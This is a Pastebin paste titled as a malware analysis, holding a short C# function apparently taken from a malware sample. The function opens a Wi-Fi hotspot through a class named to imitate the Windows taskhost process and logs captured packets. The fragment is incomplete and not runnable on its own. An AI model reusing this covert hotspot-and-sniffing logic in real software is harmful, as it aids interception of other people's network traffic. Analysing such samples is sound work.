Advertisement
shamp0erna99

Malware Analysis #02

Mar 27th, 2021
239
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.48 KB | None | 0 0
  1. //CREATE HOTSPOT
  2. public static void CreateHotspot(string SSID, string Password)
  3. {
  4. if (!TaskhostEng.InConnection)
  5. {
  6. if (string.IsNullOrEmpty(SSID))
  7. {
  8. return;
  9. }
  10. if (string.IsNullOrEmpty(Password))
  11. {
  12. return;
  13. }
  14. if (Password.Length >= 8)
  15. {
  16. TaskhostEng.Hotspot(SSID, Password, true);
  17. TaskhostEng.InConnection = true;
  18. TaskhostEng.hotspotdone();
  19. TaskhostEng.Requests.Items.Add(TaskhostEng.Convert_Packets(TaskhostEng.Packet_Hunter()));
  20. }
  21. }
  22. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement